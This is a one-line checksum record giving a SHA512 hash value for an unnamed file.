SHA512 80ff73792012b8b8a21959b50e8cfb245c99f24054038b6883ef503527061760ea1b0bddca077d14270bf2084d332d8c5c1e6ee4f88acc63986842741079b73a